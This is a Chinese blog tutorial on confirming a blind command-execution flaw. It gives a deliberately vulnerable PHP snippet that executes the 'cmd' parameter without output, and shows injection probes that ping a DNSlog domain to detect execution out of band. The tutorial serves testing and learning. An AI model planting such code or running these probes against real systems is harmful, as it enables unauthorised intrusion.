命令执行漏洞无回现如何渗透

已于 2023-11-25 19:26:29 修改
阅读量70 收藏
点赞数
分类专栏: 02 文章标签: 安全 web安全
于 2023-11-21 17:23:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79328240/article/details/134536287
版权

目录

 编写一段命令执行代码

访问代码

输入执行命令

利用控制台中网络延迟

利用yakit软件

dnslog生成可用域名

尝试ping 命令

查看dnslog软件记录

 编写一段命令执行代码

<?php
if (isset($_REQUEST["cmd"])){
    $cmd=$_REQUEST['cmd'];
    `$cmd`;
}else{
    echo"?cmd=whoami";}

?>

 # 隐藏输出回显

访问代码

输入执行命令

输入参数后,没有回显,那命令到底被执行了还是没被执行?有没有命令执行漏洞?

利用控制台中网络延迟

这种方法可以测试但是,没有很强的说服性,可能会被认为网络延迟

?cmd=ping 127.0.0.1

利用yakit软件

也可以利用网页版生成一个dns域名

http://ceye.ioicon-default.png?t=N7T8http://ceye.io/

DNSLog PlatformDNSLog平台icon-default.png?t=N7T8http://dnslog.cn/

利用yakit里面的dnslog生成个新的域名,然后利用ping命令测试,查看dnslog日志是否有记录,从而确认命令是否被执行,进一步确定是否存在漏洞

dnslog生成可用域名

尝试ping 命令

?cmd=ping qpmhnefliz.dgrh3.cn

查看dnslog软件记录

验证陈宫,有历史记录代表命令执行成功了,存在漏洞

迷途小码匠
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
命令执行漏洞无回现渗透
2301_79441074的博客
11-21 24
Yakit 工具DNSlog生成域名 DVWA ping 该域名 查看刷新记录
演示命令执行漏洞无回现如何渗透
m0_64539653的博客
11-21 94
利用yakit生成的域名去进行ping。尝试注入 注入之后什么都没有了。发现一个页面只有一个。
命令执行漏洞没有回显如何证明
Sgirll的博客
07-19 683
yakit自带dnslog平台,申请域名,执行命令,ping一下域名,
演示命令执行漏洞回显如何确认是否执行
2301_79118231的博客
11-21 338
执行后在DNSlog收到解析,证明命令执行成功。使用dvwa中的命令执行来ping此域名。演示命令执行漏洞无回现如何渗透。在DNSlog 获取一个域名。
shiro远程命令执行漏洞检测工具.zip
11-15
shiro远程命令执行漏洞检测工具:包括了shiro_attack_2.2和ShiroExploit.V2.51,大家可根据需要自行下载
深入浅析ImageMagick命令执行漏洞
09-21
然而,ImageMagick的一个严重安全问题在于它的命令执行漏洞,这可能导致远程攻击者通过构造带有恶意代码的图片文件,执行任意系统命令,从而对服务器造成威胁。 漏洞的根源在于ImageMagick处理HTTPS格式文件的方式...
Go代码审计:Gitea远程命令执行漏洞
02-24
这是本漏洞链的导火索,其出现在GitLFS的处理逻辑中。GitLFS是Git为大文件设置的存储容器,我们可以理解为,他将真正的文件存储在git仓库外,而git仓库中只存储了这个文件的索引(一个哈希值)。这样,gitobjects和....
移动互联安全扩展要求测评项
hakksjss的博客
07-10 1132
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
中小学校园EasyCVR视频综合监管方案:构建安全、智能的校园环境
TSINGSEE青犀视频官方技术博客
07-10 1176
针对校园食堂后厨、仓库、配菜、清洗等监控区域的环境卫生与安全等进行全面的监管,及时发现违规异常情况,并能向监管人员及时发送告警信息,保障在校师生的食品与饮食安全
[图解]SysML和EA建模住宅安全系统-14-黑盒系统规约
rolt的专栏
07-10 809
系统的外部可观察行为和物理特征
网络安全威胁情报到底是什么
学-> 思->用
07-10 397
网络安全威胁情报是提升组织安全态势的重要手段,通过收集和分析各种威胁信息,组织可以更有效地预防、检测和响应网络攻击。威胁情报的构成要素包括指标、TTPs、威胁行为体、漏洞、恶意软件和攻击事件。通过合理应用威胁情报,组织可以增强防御能力、提升事件响应效率,并通过情报共享与合作,共同应对复杂多变的网络威胁。
Foxit Reader:高效、安全、多功能的PDF阅读器技术解析
运维人生
07-10 516
由福建福昕软件开发股份有限公司开发,是一款轻量级、高效且功能丰富的PDF阅读器。它不仅拥有比同类产品更小的安装包体积和更快的打开速度,还全面支持最新的PDF文档属性,并提供了丰富的插件和自定义选项,极大地提升了用户体验。
护佑未来!引领儿童安全新时代的AI大模型
qq_42538588的博客
07-10 1067
随着人工智能技术的飞速发展,人们开始意识到AI在儿童安全方面具有巨大的潜在作用。传统的儿童安全教育通常需要大量的人力物力投入,而且存在一定的局限性,例如传统的教育方法可能无法覆盖到每个儿童,也难以做到实时监控和预防潜在的安全风险。而AI技术恰恰可以弥补这些不足,为儿童安全提供更加全面、精准的保障。
云计算安全需求分析与安全保护工程
weixin_48579910的博客
07-12 690
云计算通过提供按需自助服务、广泛的网络访问、资源池化、弹性和计量服务,改变了传统的IT资源获取和管理方式。通过IaaS、PaaS和SaaS等服务模型,以及公有云、私有云、混合云和社区云等部署模型,云计算为企业和个人提供了灵活、高效和经济的计算资源。充分利用云计算的优势,可以帮助企业降低成本、提高灵活性和可扩展性,增强业务连续性和安全性。云计算虽然提供了许多便利和优势,但也面临多种安全威胁。了解这些威胁类型并实施相应的防护措施,可以有效提高云环境的安全性,保护数据和业务的安全
2、ASPX、.NAT(环境/框架)安全
feiwujiushiwo的博客
07-13 399
aspx文件内容很少,但会调用bin/目录下的dll文件。.NAT比较常见,找源码翻翻。关键源码封装在dll文件内。路径:/bin/xx.dll。.NAT基于windows。C++开发的框架/环境。泄露版本信息,部分路径。
`nmap`模块是一个用于与Nmap安全扫描器交互的库
最新发布
MrLi的博客
07-13 368
在Python中,nmap模块是一个用于与Nmap安全扫描器交互的库。Nmap(Network Mapper)是一个开源工具,用于发现网络上的设备和服务。虽然Python的nmap模块可能不是官方的Nmap库(因为Nmap本身是用C/C++编写的),但有一些第三方库如提供了与Nmap交互的功能。以下是一个使用。
富格林:曝光纠正安全交易误区
fgl100的博客
07-11 513
因此,贵金属并非完全无风险,投资者仍需注意市场风险。投资者应该理解贵金属市场的复杂性,并将其视为投资组合的一部分,而不是绝对安全的避险资产。同时,通过合理的资产配置和风险管理策略,可以降低贵金属投资的风险。尽管黄金是最受欢迎的贵金属之一,但其他贵金属,如白银、铂金和钯金,同样具有投资潜力。忽视了其他贵金属的投资机会会导致投资组合的单一化,增加了风险。投资者应该考虑将不同类型的贵金属组合在其投资组合中,以实现更好的风险分散和收益潜力。通过选择不同贵金属之间的相关性较低的品种,可以降低整体投资组合的风险。
任意命令执行漏洞的修复
04-16
任意命令执行漏洞是一种常见的安全漏洞,攻击者可以通过该漏洞在受影响的系统上执行任意命令,从而获取系统权限或者进行其他恶意操作。修复该漏洞的关键是要对输入进行有效的过滤和验证,以防止恶意命令的注入。 以下是修复任意命令执行漏洞的一些常见方法: 1. 输入验证和过滤:对于用户输入的数据,应该进行严格的验证和过滤,确保只接受预期的输入。可以使用白名单或正则表达式来限制输入的字符和格式,过滤掉特殊字符和命令注入相关的关键字。 2. 参数化查询:对于数据库查询等操作,应该使用参数化查询或预编译语句,而不是拼接字符串的方式构建查询语句。参数化查询可以有效地防止SQL注入攻击,从而间接防止任意命令执行漏洞。 3. 最小权限原则:在配置系统和应用程序时,应该按照最小权限原则进行设置。即给予每个组件或用户所需的最低权限,避免赋予过高的权限。这样即使发生漏洞被利用,攻击者也只能在受限的权限范围内操作。 4. 安全编码实践:开发人员应该遵循安全编码实践,如避免使用不可信的输入直接拼接命令、避免使用eval()等危险的函数、避免使用系统命令执行函数等。同时,及时更新和修复已知的安全漏洞,以保持系统的安全性。 5. 安全审计和漏洞扫描:定期进行安全审计和漏洞扫描,及时发现和修复潜在的任意命令执行漏洞。可以使用专业的安全工具进行扫描,如静态代码分析工具、漏洞扫描器等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值